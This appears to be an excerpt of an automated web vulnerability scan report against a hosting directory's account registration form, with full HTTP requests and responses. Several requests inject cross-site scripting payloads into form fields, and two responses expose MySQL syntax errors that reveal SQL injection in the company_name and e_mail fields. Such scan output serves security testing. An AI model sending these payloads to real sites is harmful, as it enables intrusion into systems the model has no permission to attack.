Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | '"--></style></script><script>alert(0x001CAE)</script>
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CAE)%3c%2fscript%3e&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
| Parameter | Type | Value |
|---|---|---|
| account_type | POST | 1 |
| address | POST | 3 |
| address2 | POST | 3 |
| B1 | POST | Create An Account! |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_country | POST | 240 |
| bill_phone | POST | 3 |
| bill_province | POST | 3 |
| bill_state | POST | 3 |
| bill_zip | POST | 3 |
| card_number | POST | 3 |
| card_type | POST | 1 |
| city | POST | '"--></style></script><script>alert(0x001CBE)</script> |
| company_name | POST | Smith |
| copy_from_cont | POST | 1 |
| country | POST | 240 |
| deposit | POST | 3 |
| e_mail | POST | netsparker@example.com |
| expire_date | POST | 3 |
| first_name | POST | Smith |
| last_name | POST | Smith |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| password | POST | 3 |
| phone | POST | 3 |
| promo_code | POST | 3 |
| province | POST | 3 |
| retype_e_mail | POST | netsparker@example.com |
| retype_password | POST | 3 |
| state | POST | 3 |
| zip | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CBE)%3c%2fscript%3e&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
| Parameter | Type | Value |
|---|---|---|
| account_type | POST | 1 |
| address | POST | 3 |
| address2 | POST | 3 |
| B1 | POST | Create An Account! |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_country | POST | 240 |
| bill_phone | POST | 3 |
| bill_province | POST | 3 |
| bill_state | POST | 3 |
| bill_zip | POST | 3 |
| card_number | POST | 3 |
| card_type | POST | 1 |
| city | POST | 3 |
| company_name | POST | '"--></style></script><script>alert(0x001CBF)</script> |
| copy_from_cont | POST | 1 |
| country | POST | 240 |
| deposit | POST | 3 |
| e_mail | POST | netsparker@example.com |
| expire_date | POST | 3 |
| first_name | POST | Smith |
| last_name | POST | Smith |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| password | POST | 3 |
| phone | POST | 3 |
| promo_code | POST | 3 |
| province | POST | 3 |
| retype_e_mail | POST | netsparker@example.com |
| retype_password | POST | 3 |
| state | POST | 3 |
| zip | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 579
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CBF)%3c%2fscript%3e&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 338
Connection: close
Content-Type: text/html; charset=UTF-8

Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001CBF)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''"--></style></script><script>netsparker(0x001CBF)</script>'
Parameters
| Parameter | Type | Value |
|---|---|---|
| account_type | POST | 1 |
| address | POST | 3 |
| address2 | POST | 3 |
| B1 | POST | Create An Account! |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_country | POST | 240 |
| bill_phone | POST | 3 |
| bill_province | POST | 3 |
| bill_state | POST | 3 |
| bill_zip | POST | 3 |
| card_number | POST | 3 |
| card_type | POST | 1 |
| city | POST | 3 |
| company_name | POST | Smith |
| copy_from_cont | POST | 1 |
| country | POST | 240 |
| deposit | POST | '"--></style></script><script>alert(0x001CDE)</script> |
| e_mail | POST | netsparker@example.com |
| expire_date | POST | 3 |
| first_name | POST | Smith |
| last_name | POST | Smith |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| password | POST | 3 |
| phone | POST | 3 |
| promo_code | POST | 3 |
| province | POST | 3 |
| retype_e_mail | POST | netsparker@example.com |
| retype_password | POST | 3 |
| state | POST | 3 |
| zip | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CDE)%3c%2fscript%3e&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<option value='325A5101EE35607386F14BEAF3B24ED4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073F7DA583E2BA7F856C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607324843899875061D2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560730EE30AF638B18D51C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560737CDC0154D4D85E77C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE3560739B803AD707AA3104C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE35607363B9AAF3D26A24C36F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073C90502BAE12E97E46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073E4928E5F38EB685E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  '"--></style></script><script>alert(0x001CDF)</script>
expire_date       POST  3
first_name        POST  Smith
last_name         POST  Smith
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 560
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CDF)%3c%2fscript%3e&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 333
Connection: close
Content-Type: text/html; charset=UTF-8

Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001cdf)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''"--></style></script><script>netsparker(0x001cdf)</script>'
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  '"--></style></script><script>alert(0x001CE0)</script>
first_name        POST  Smith
last_name         POST  Smith
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE0)%3c%2fscript%3e&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:50:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560737FF910612CB34B5DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560733D430B89B505B7896F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073210F28D233B6C8D2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE35607308122366D9EDDA89C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073D281AF1C53F5B0876F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E47460418D3E5008C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE35607312A81DF406D44B61C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073C525378FDC0F701E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073ED2C5D79D1366106C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073E3E4D3F2544FAC396F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE356073344DFDF5D771D7A9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073FCE5446CB7027EA1C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE356073BBF64FF25F0D4D67C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073DBFE8EF38A1217EAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560739CF2B153DDA8FB2BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073CD00CC4375A49874C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option 